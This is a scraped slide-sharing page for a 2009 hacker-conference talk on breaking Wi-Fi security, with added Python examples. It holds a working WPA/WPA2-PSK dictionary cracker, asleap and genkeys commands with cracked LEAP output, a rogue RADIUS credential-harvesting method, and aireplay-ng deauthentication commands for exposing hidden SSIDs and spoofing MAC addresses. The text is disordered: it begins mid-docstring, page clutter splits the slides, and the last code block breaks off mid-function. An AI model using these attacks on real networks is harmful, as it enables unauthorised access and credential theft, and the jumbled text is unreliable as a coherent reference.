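aircrack-ng -w. Added example; the handshake is constructed below, not captured."""
import hashlib
import hmac

MIC_OFFSET = 81   # 4-byte 802.1X header + 77 bytes of EAPOL-Key fields precede the 16-byte Key MIC


def pmk_from_passphrase(passphrase: str, ssid: str) -> bytes:
    """PMK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 32 bytes): aircrack's 'Master Key'.
    The 4096 iterations are what hold a dictionary attack to a few thousand guesses per second per core."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def ptk_from_pmk(pmk: bytes, ap_mac: bytes, sta_mac: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """802.11i PRF-512: PTK = PRF(PMK, "Pairwise key expansion",
    min(AA,SPA) || max(AA,SPA) || min(ANonce,SNonce) || max(ANonce,SNonce)).
    aircrack prints the 64 bytes as 'Transient Key'; bytes 0..15 are the KCK that keys the MIC."""
    data = min(ap_mac, sta_mac) + max(ap_mac, sta_mac) + min(anonce, snonce) + max(anonce, snonce)
    blocks = (hmac.new(pmk, b"Pairwise key expansion\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4))
    return b"".join(blocks)[:64]


def build_eapol_msg2(snonce: bytes, descriptor_version: int, mic: bytes = b"\x00" * 16) -> bytes:
    """Constructed EAPOL-Key message 2 (station -> AP, carries the SNonce) with an empty Key Data field.
    descriptor_version 1 = HMAC-MD5 MIC (WPA/TKIP), 2 = HMAC-SHA1-128 MIC (WPA2/CCMP)."""
    key_info = (1 << 8) | (1 << 3) | descriptor_version    # Key MIC bit, Pairwise bit, descriptor version
    body = (bytes([2])                                     # descriptor type 2 = RSN (802.11i)
            + key_info.to_bytes(2, "big")
            + (16).to_bytes(2, "big")                      # key length
            + (1).to_bytes(8, "big")                       # replay counter
            + snonce + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # nonce, key IV, key RSC, key ID
            + mic + (0).to_bytes(2, "big"))                # Key MIC, Key Data length
    return bytes([1, 3]) + len(body).to_bytes(2, "big") + body   # 802.1X v1, type 3 = EAPOL-Key


def eapol_mic(kck: bytes, eapol: bytes) -> bytes:
    """MIC over the whole 802.1X frame with the MIC field zeroed: aircrack's 'EAPOL HMAC'."""
    version = int.from_bytes(eapol[5:7], "big") & 0x7
    zeroed = eapol[:MIC_OFFSET] + b"\x00" * 16 + eapol[MIC_OFFSET + 16:]
    if version == 1:
        return hmac.new(kck, zeroed, hashlib.md5).digest()
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def crack_handshake(ssid, ap_mac, sta_mac, anonce, snonce, eapol, wordlist):
    """For each candidate: PMK -> PTK -> KCK -> recompute the MIC and compare with the captured one."""
    captured = eapol[MIC_OFFSET:MIC_OFFSET + 16]
    for word in wordlist:
        if not 8 <= len(word) <= 63:       # WPA passphrases are 8..63 characters; shorter ones cannot match
            continue
        pmk = pmk_from_passphrase(word, ssid)
        ptk = ptk_from_pmk(pmk, ap_mac, sta_mac, anonce, snonce)
        if hmac.compare_digest(eapol_mic(ptk[:16], eapol), captured):
            return word, pmk, ptk
    return None


# Constructed scenario: BSSID and station MAC from the deck's hexdumps; nonces and passphrase made up.
SSID = "Workshop"
AP_MAC = bytes.fromhex("001b2f3dcbd6")
STA_MAC = bytes.fromhex("002127c00771")
ANONCE = bytes(range(32))                  # on a real capture: Key Nonce of message 1 (or 3)
SNONCE = bytes(range(32, 64))              # on a real capture: Key Nonce of message 2
PASSPHRASE = "workshop2009"
WORDLIST = ["password", "short", "linksys123", "workshop2009", "TheWPAKey"]


def make_capture(descriptor_version: int = 2) -> bytes:
    """Stand-in for the airodump-ng capture: message 2 with a MIC computed under the real passphrase."""
    ptk = ptk_from_pmk(pmk_from_passphrase(PASSPHRASE, SSID), AP_MAC, STA_MAC, ANONCE, SNONCE)
    unsigned = build_eapol_msg2(SNONCE, descriptor_version)
    return build_eapol_msg2(SNONCE, descriptor_version, eapol_mic(ptk[:16], unsigned))


def demo(descriptor_version: int = 2):
    hit = crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, make_capture(descriptor_version), WORDLIST)
    return hit[0] if hit else None


if __name__ == "__main__":
    word, pmk, ptk = crack_handshake(SSID, AP_MAC, STA_MAC, ANONCE, SNONCE, make_capture(), WORDLIST)
    print("KEY FOUND!", word)
    print("Master Key    :", pmk.hex())
    print("Transient Key :", ptk.hex())
```

Two details matter in practice and are visible in the code: the MIC algorithm follows the descriptor version in the Key Information field (HMAC-MD5 for WPA/TKIP, HMAC-SHA1 truncated to 16 bytes for WPA2/CCMP), and a wrong ANonce or SNonce makes every candidate fail, which is why aircrack-ng insists on a complete handshake from one client rather than stray EAPOL frames from several.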
Exploiting Wireless Enterprise (WPA-TLS/TTLS/PEAP)
    Most companies have moved to 802.1X with public key encryption (EAP-TLS, EAP-TTLS, PEAP) for their wireless network and think it is perfectly safe.
    But the tricky hacker still attacks this system by spoofing the certificate: he brings up a rogue access point with the same ESSID and his own RADIUS server, which presents a certificate of his own.
    This method takes advantage of client incaution. Many clients accept the server certificate without checking whether it is genuine (the right CA, the right server name), so the attacker impersonates the RADIUS server and collects the login credentials the victims send inside the tunnel.
    We can use FreeRADIUS as the fake RADIUS server, combined with the WPE patch, which makes FreeRADIUS log the inner authentication (username and MS-CHAPv2 challenge/response) for offline cracking.
    The defence is the flip side of the same point: configure the clients to validate the server certificate against a pinned CA and server name, and to refuse to connect when it does not match.
    Additional information:
    http://www.willhackforsushi.com/FreeRADIUS_WPE.html
Exploiting CISCO LEAP
    Cisco's proprietary Lightweight Extensible Authentication Protocol (LEAP) wireless authentication process is advertised as helping eliminate security vulnerabilities by supporting centralized, user-based authentication and the ability to generate dynamic WEP keys.
    Cisco LEAP is one of the Extensible Authentication Protocol (EAP) types carried over 802.1X.
    We found that the usernames sent to the RADIUS server are plaintext (captured with Wireshark); the password itself is not sent, but LEAP proves it with an MS-CHAP style challenge/response, and that exchange can be cracked offline.
    So it's also vulnerable to exploit... (insert evil
Exploiting CISCO LEAP
    asleap is a tool designed to recover weak LEAP (Cisco's Lightweight Extensible Authentication Protocol) and PPTP passwords.
    asleap can perform:
     Weak LEAP and PPTP password recovery from pcap and AiroPeek files or from live capture
     Deauthentication of clients on a LEAP WLAN (speeding up LEAP password recovery): AIRJACK DRIVER REQUIRED
    Download here: http://asleap.sourceforge.net/
Exploiting CISCO LEAP
    First step: use genkeys to produce the necessary database (.dat) and index (.idx) files. genkeys computes the NT hash (MD4 of the UTF-16LE password) of every word and sorts the table by the last two bytes of the hash, which is the lookup asleap needs later.
#./genkeys -r dictionary -f dict.dat -n dict.idx

dictionary = our wordlist/dictionary file, with one word per line
dict.dat = our new output password+hash file (generated as a result of running this command)
dict.idx = our new output index file (generated as a result of running this command)
-----------------------------------------------------------------------
genkeys 1.4 - generates lookup file for asleap. <jwright@hasborg.com>
Generating hashes for passwords (this may take some time) ...Done.
3 hashes written in 0.2 seconds: 122.67 hashes/second
Starting sort (be patient) ...Done.
Completed sort in 0 compares.
Creating index file (almost finished) ...Done.
–----------------------------------------------------------------------
Exploiting CISCO LEAP
    The final step in recovering our weak LEAP password is to run the asleap command with our newly created .dat and .idx files:
#./asleap -r data/leap.dump -f dict.dat -n dict.idx

leap.dump = our libpcap packet capture file (NOTE: any libpcap (e.g. tcpdump, Wireshark) or AiroPeek capture file (.apc) can be used)
dict.dat = our password+hash file (generated with genkeys, see above)
dict.idx = our index file (generated with genkeys, see above)
Exploiting CISCO LEAP
    So… what are we waiting for?


#./asleap -r data/leap.dump -f dict.dat -n dict.idx

-----------------------------------------------------------------------
asleap 1.4 - actively recover LEAP/PPTP passwords. <jwright@hasborg.com>
Using the passive attack method.
Captured LEAP exchange information:
            username:     qa_leap
            challenge:    0786aea0215bc30a
            response:     7f6a14f11eeb980fda11bf83a142a8744f00683ad5bc5cb6
            hash bytes:   4a39
            NT hash:      a1fc198bdbf5833a56fb40cdd1a64a39
            password:     qaleap
Closing pcap ...
-----------------------------------------------------------------------


    Why the output shows "hash bytes: 4a39" before the password: LEAP, like MS-CHAPv1, splits the 16-byte NT hash into three DES keys and pads the third with five zero bytes, so the last 8 bytes of the response depend on only two unknown hash bytes. asleap brute-forces those two bytes (at most 65536 DES operations), then only tries the wordlist entries whose hash ends in 4a39 (the index built by genkeys); the full NT hash and the password follow.
    asleap 2.2 adds the -C and -R options, which take the hex-delimited bytes of the challenge and the response respectively. With them asleap becomes a generic MS-CHAPv2 cracking tool and can be applied any time you have an MS-CHAPv2 exchange, such as the one FreeRADIUS-WPE logs from a PEAP or TTLS client.
References & Greetz to
    PaulDotCom Forum
    http://www.darkoperator.com/scripts
    http://trac.metasploit.com/wiki/Karmetasploit
    http://aircrack-ng.org/doku.php
    http://www.citec.us
    http://www.milw0rm.com

    Greetz to the CWH Underground team:
        Greetz: ZeQ3uL, JabAv0C, p3lo, Sh0ck, BAD $ectors, Snapter, Conan, Win7dos, Gdiupo, GnuKDE, JK
        Special Thx: asylu3, str0ke, citec.us, milw0rm.com
About Me / Questions
    I'm Siddiq, 19.
     Currently pursuing a Degree in Biochemistry at Technology Park Malaysia College.
     A retarded lazy part-time web programmer @ I-don't-know-anything-about-IT
     Currently looking for a real part-time job.
     mysiddiq@gmail.com

    Thanks for attending.

    Questions?
 

Similar to Ahmad Siddiq Wi-Fi Ninjutsu Exploitation (20)

Cracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless NetworksCracking Wep And Wpa Wireless Networks
Cracking Wep And Wpa Wireless Networks
 
Wi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu ExploitationWi-Foo Ninjitsu Exploitation
Wi-Foo Ninjitsu Exploitation
 
Aircrack
AircrackAircrack
Aircrack
 
Cracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless NetworksCracking WEP Secured Wireless Networks
Cracking WEP Secured Wireless Networks
 
WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"WiFi practical hacking "Show me the passwords!"
WiFi practical hacking "Show me the passwords!"
 
Wireless Pentesting: It's more than cracking WEP
Wireless Pentesting: It's  more than cracking WEPWireless Pentesting: It's  more than cracking WEP
Wireless Pentesting: It's more than cracking WEP
 
Exploiting WiFi Security
Exploiting WiFi Security Exploiting WiFi Security
Exploiting WiFi Security
 
Wireless Security null seminar
Wireless Security null seminarWireless Security null seminar
Wireless Security null seminar
 
Securing the network for VMs or Containers
Securing the network for VMs or ContainersSecuring the network for VMs or Containers
Securing the network for VMs or Containers
 
Challenges Building Secure Mobile Applications
Challenges Building Secure Mobile ApplicationsChallenges Building Secure Mobile Applications
Challenges Building Secure Mobile Applications
 
Deep submicron-backdoors-ortega-syscan-2014-slides
Deep submicron-backdoors-ortega-syscan-2014-slidesDeep submicron-backdoors-ortega-syscan-2014-slides
Deep submicron-backdoors-ortega-syscan-2014-slides
 
Fundamentals of network hacking
Fundamentals of network hackingFundamentals of network hacking
Fundamentals of network hacking
 
Cracking wep and wpa wireless networks
Cracking wep and wpa wireless networksCracking wep and wpa wireless networks
Cracking wep and wpa wireless networks
 
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
[CB20] Vulnerabilities of Machine Learning Infrastructure by Sergey Gordeychik
 
Hta r33
Hta r33Hta r33
Hta r33
 
Wireless Hacking Fast Track
Wireless Hacking Fast TrackWireless Hacking Fast Track
Wireless Hacking Fast Track
 
KVM Security Groups Under the Hood - Wido den Hollander - Your.Online
KVM Security Groups Under the Hood - Wido den Hollander - Your.OnlineKVM Security Groups Under the Hood - Wido den Hollander - Your.Online
KVM Security Groups Under the Hood - Wido den Hollander - Your.Online
 
Vpn 3854d825
Vpn 3854d825Vpn 3854d825
Vpn 3854d825
 
Wireless Pentest & Capturing a WPA2 Four-Way Handshake
Wireless Pentest & Capturing a WPA2 Four-Way HandshakeWireless Pentest & Capturing a WPA2 Four-Way Handshake
Wireless Pentest & Capturing a WPA2 Four-Way Handshake
 
Code Red Security
Code Red SecurityCode Red Security
Code Red Security
 

More from barcamp.my

Michael Reyes: 360 Persuasion
Michael Reyes: 360 PersuasionMichael Reyes: 360 Persuasion
Michael Reyes: 360 Persuasionbarcamp.my
 
Hackintosh BarcampKL
Hackintosh BarcampKLHackintosh BarcampKL
Hackintosh BarcampKLbarcamp.my
 
Ching Yee Fu: Next 4 Billion
Ching Yee Fu: Next 4 BillionChing Yee Fu: Next 4 Billion
Ching Yee Fu: Next 4 Billionbarcamp.my
 
Ikhwan Nazri: Your Office is everywhere - Mobile Office
Ikhwan Nazri: Your Office is everywhere - Mobile OfficeIkhwan Nazri: Your Office is everywhere - Mobile Office
Ikhwan Nazri: Your Office is everywhere - Mobile Officebarcamp.my
 
Y.K. Goon: Why you have email overload... and I don't
Y.K. Goon: Why you have email overload... and I don'tY.K. Goon: Why you have email overload... and I don't
Y.K. Goon: Why you have email overload... and I don'tbarcamp.my
 
Updated: Barcamp Kl 0409 Hacker Space Kl 2
Updated: Barcamp Kl 0409 Hacker Space  Kl 2Updated: Barcamp Kl 0409 Hacker Space  Kl 2
Updated: Barcamp Kl 0409 Hacker Space Kl 2barcamp.my
 
Gerard KM Lim: MAD over Mobile Apps!!!
Gerard KM Lim: MAD over Mobile Apps!!!Gerard KM Lim: MAD over Mobile Apps!!!
Gerard KM Lim: MAD over Mobile Apps!!!barcamp.my
 
James Yeang: 3 Really Cool Wordpress Tricks
James Yeang: 3 Really Cool Wordpress TricksJames Yeang: 3 Really Cool Wordpress Tricks
James Yeang: 3 Really Cool Wordpress Tricksbarcamp.my
 
See Tshiung Han: Collective Action And Clay Shirky
See Tshiung Han: Collective Action And Clay ShirkySee Tshiung Han: Collective Action And Clay Shirky
See Tshiung Han: Collective Action And Clay Shirkybarcamp.my
 
Barcamp Kl 0409 Hacker Space Kl
Barcamp Kl 0409 Hacker Space KlBarcamp Kl 0409 Hacker Space Kl
Barcamp Kl 0409 Hacker Space Klbarcamp.my
 
Ben Ng - HomeLoan Business - Mortgage Agency Business
Ben Ng  - HomeLoan Business - Mortgage Agency BusinessBen Ng  - HomeLoan Business - Mortgage Agency Business
Ben Ng - HomeLoan Business - Mortgage Agency Businessbarcamp.my
 
Ben Ng - HomeLoan Business - Mortgage Agency Business
Ben Ng  - HomeLoan Business - Mortgage Agency BusinessBen Ng  - HomeLoan Business - Mortgage Agency Business
Ben Ng - HomeLoan Business - Mortgage Agency Businessbarcamp.my
 

More from barcamp.my (12)

Michael Reyes: 360 Persuasion
Michael Reyes: 360 PersuasionMichael Reyes: 360 Persuasion
Michael Reyes: 360 Persuasion
 
Hackintosh BarcampKL
Hackintosh BarcampKLHackintosh BarcampKL
Hackintosh BarcampKL
 
Ching Yee Fu: Next 4 Billion
Ching Yee Fu: Next 4 BillionChing Yee Fu: Next 4 Billion
Ching Yee Fu: Next 4 Billion
 
Ikhwan Nazri: Your Office is everywhere - Mobile Office
Ikhwan Nazri: Your Office is everywhere - Mobile OfficeIkhwan Nazri: Your Office is everywhere - Mobile Office
Ikhwan Nazri: Your Office is everywhere - Mobile Office
 
Y.K. Goon: Why you have email overload... and I don't
Y.K. Goon: Why you have email overload... and I don'tY.K. Goon: Why you have email overload... and I don't
Y.K. Goon: Why you have email overload... and I don't
 
Updated: Barcamp Kl 0409 Hacker Space Kl 2
Updated: Barcamp Kl 0409 Hacker Space  Kl 2Updated: Barcamp Kl 0409 Hacker Space  Kl 2
Updated: Barcamp Kl 0409 Hacker Space Kl 2
 
Gerard KM Lim: MAD over Mobile Apps!!!
Gerard KM Lim: MAD over Mobile Apps!!!Gerard KM Lim: MAD over Mobile Apps!!!
Gerard KM Lim: MAD over Mobile Apps!!!
 
James Yeang: 3 Really Cool Wordpress Tricks
James Yeang: 3 Really Cool Wordpress TricksJames Yeang: 3 Really Cool Wordpress Tricks
James Yeang: 3 Really Cool Wordpress Tricks
 
See Tshiung Han: Collective Action And Clay Shirky
See Tshiung Han: Collective Action And Clay ShirkySee Tshiung Han: Collective Action And Clay Shirky
See Tshiung Han: Collective Action And Clay Shirky
 
Barcamp Kl 0409 Hacker Space Kl
Barcamp Kl 0409 Hacker Space KlBarcamp Kl 0409 Hacker Space Kl
Barcamp Kl 0409 Hacker Space Kl
 
Ben Ng - HomeLoan Business - Mortgage Agency Business
Ben Ng  - HomeLoan Business - Mortgage Agency BusinessBen Ng  - HomeLoan Business - Mortgage Agency Business
Ben Ng - HomeLoan Business - Mortgage Agency Business
 
Ben Ng - HomeLoan Business - Mortgage Agency Business
Ben Ng  - HomeLoan Business - Mortgage Agency BusinessBen Ng  - HomeLoan Business - Mortgage Agency Business
Ben Ng - HomeLoan Business - Mortgage Agency Business
 

Recently uploaded

Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)wesley chun
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessPixlogix Infotech
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptxHampshireHUG
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CVKhem
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘RTylerCroy
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonAnna Loughnan Colquhoun
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProduct Anonymous
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...apidays
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobeapidays
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?Igalia
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilV3cube
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024The Digital Insurer
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUK Journal
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 

Recently uploaded (20)

Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)Powerful Google developer tools for immediate impact! (2023-24 C)
Powerful Google developer tools for immediate impact! (2023-24 C)
 
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law DevelopmentsTrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
TrustArc Webinar - Stay Ahead of US State Data Privacy Law Developments
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
 
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
04-2024-HHUG-Sales-and-Marketing-Alignment.pptx
 
Real Time Object Detection Using Open CV
Real Time Object Detection Using Open CVReal Time Object Detection Using Open CV
Real Time Object Detection Using Open CV
 
🐬 The future of MySQL is Postgres 🐘
🐬  The future of MySQL is Postgres   🐘🐬  The future of MySQL is Postgres   🐘
🐬 The future of MySQL is Postgres 🐘
 
Data Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt RobisonData Cloud, More than a CDP by Matt Robison
Data Cloud, More than a CDP by Matt Robison
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemkeProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
ProductAnonymous-April2024-WinProductDiscovery-MelissaKlemke
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?A Year of the Servo Reboot: Where Are We Now?
A Year of the Servo Reboot: Where Are We Now?
 
Developing An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of BrazilDeveloping An App To Navigate The Roads of Brazil
Developing An App To Navigate The Roads of Brazil
 
Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024Axa Assurance Maroc - Insurer Innovation Award 2024
Axa Assurance Maroc - Insurer Innovation Award 2024
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 

Ahmad Siddiq Wi-Fi Ninjutsu Exploitation

  • 1. Special thanks to: Milw0rm | str0ke. Paperwork released on 24/2/2009. AHMAD, JabAv0C && ZeQ3uL from CWH Underground | cwh.citec.us / www.citec.us
  • 2. Contents
    - Introduction
    - Security of Wireless network
    - Breaking the Simple Defenses: MAC Filtering; Discover Hidden SSID; Sniffing Information on the Air
    - Get closer with cracking tool: Aircrack-ng suite; Decrypt packets with airdecap-ng; Decloak packets with airdecloak-ng
    - Owned the WEP Key with Simple Technique (No Injection): Capturing method; Cracking method
    - Owned the WEP Key with Advanced Technique (With Inject Method): Monitor Mode; Fake Authentication; ARP Replay Attack; Fragmentation Attack; Korek ChopChop Attack; Packetforge; ARP Request Replay with Interactive Attack; Cracking WEP key
    - Conclusion: steps for cracking WEP
    - Owned the WPA-PSK / WPA2-PSK Key
    - Exploiting Enterprise Wireless Connection (WPA-TLS/TTLS/PEAP)
    - Exploiting CISCO LEAP
    - References & Greetz to
    - About Me / Questions
  • 3. Introduction. This presentation introduces the practical techniques hackers use to break wireless security. You need some basic knowledge of wireless operation to follow it.
  • 4. Security of Wireless Network. The options covered: WEP, WPA-PSK, WPA2-PSK, WPA-802.1X (enterprise) and WPA2-802.1X (enterprise).
  • 5. Breaking the Simple Defenses: Bypass MAC Filtering? (cartoon) The hacker asks to join; the AP replies "Wait wait.. lemme check with my system first... Wow! You're LEGIT! You shall pass, no0b."
  • 6. Breaking the Simple Defenses: Bypass MAC Filtering (cartoon) The AP checks nothing but the source MAC address, and that address is trivially changed, so the hacker walks in using the address of a client the AP already allows (airodump-ng lists those under STATION).
  • 7. Breaking the Simple Defenses: Discover Hidden SSID (cartoon) The AP "Ayam Goreng" is running with its SSID hidden.
  • 8. Breaking the Simple Defenses: Discover Hidden SSID
    - SSID broadcasting can be disabled in beacon frames ONLY.
    - All other management frames (probe requests/responses, association and reassociation frames) contain the SSID of the network.
    So what I can do is:
    - Forge DISASSOCIATE (or deauthentication, which is what aireplay-ng -0 sends) frames to a station, seeming to come from the ACCESS POINT, so the station tries to reassociate (and sends the SSID).
    - Reboot a client, so it reassociates when it initialises (if you have physical access to the equipment).
    - RF-jam (interfere with) a client so it tries to reassociate (and exposes the SSID).
    - Install a fake Access Point near a client with a weak signal so it tries to roam (probe requests will be sent).
  • 9. Breaking the Simple Defenses: Discover Hidden SSID
    #aireplay-ng -0 1 -a xx:xx:xx:xx:xx:xx -c zz:zz:zz:zz:zz:zz wlan0
    21:56:47 Waiting for beacon frame (BSSID: xx:xx:xx:xx:xx:xx) on channel 11
    21:56:47 Sending 64 directed DeAuth. STMAC: [zz:zz:zz:zz:zz:zz] [ 0| 0 ACKs]
    #airodump-ng wlan0
    -a is the BSSID of the access point, -c the MAC address of an associated station; "-0 1" sends a single deauthentication burst. In the running airodump-ng, the ESSID column of the hidden network changes from "<length: N>" to the real name as soon as the station reassociates. (cartoon: "Ayam Goreng" is revealed. "OSHII--")
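The mechanism slides 8 and 9 describe, as an added example that is not part of the original presentation: a beacon with a cloaked SSID element, the deauthentication frame aireplay-ng -0 spoofs from the AP, and the association and probe requests the client then sends, which carry the real name. Every frame and MAC address here is constructed (the AP/station addresses are borrowed from the slides' later hex dumps); only the 802.11 management-frame layout is standard.

```python
"""Hidden SSID in practice: the beacon carries an empty SSID element, but the
(re)association and probe frames a client sends after being deauthenticated
carry the real name. All frames below are constructed, not captured."""
import struct

NAMES = {0: "association-request", 2: "reassociation-request", 4: "probe-request",
         5: "probe-response", 8: "beacon", 12: "deauthentication"}
# Length of the fixed fields that precede the information elements, per subtype.
FIXED_LEN = {0: 4, 2: 10, 4: 0, 5: 12, 8: 12}


def parse_ies(body: bytes) -> dict:
    """Walk 802.11 information elements: 1-byte tag, 1-byte length, value."""
    ies, off = {}, 0
    while off + 2 <= len(body):
        tag, ln = body[off], body[off + 1]
        ies[tag] = body[off + 2:off + 2 + ln]
        off += 2 + ln
    return ies


def ssid_from_frame(frame: bytes):
    """Return (frame kind, SSID or None). None means cloaked: element empty or all NULs."""
    fc = struct.unpack_from("<H", frame, 0)[0]
    ftype, subtype = (fc >> 2) & 3, (fc >> 4) & 0xF
    if ftype != 0:
        return ("not-management", None)
    kind = NAMES.get(subtype, "other-management")
    if subtype not in FIXED_LEN:
        return (kind, None)
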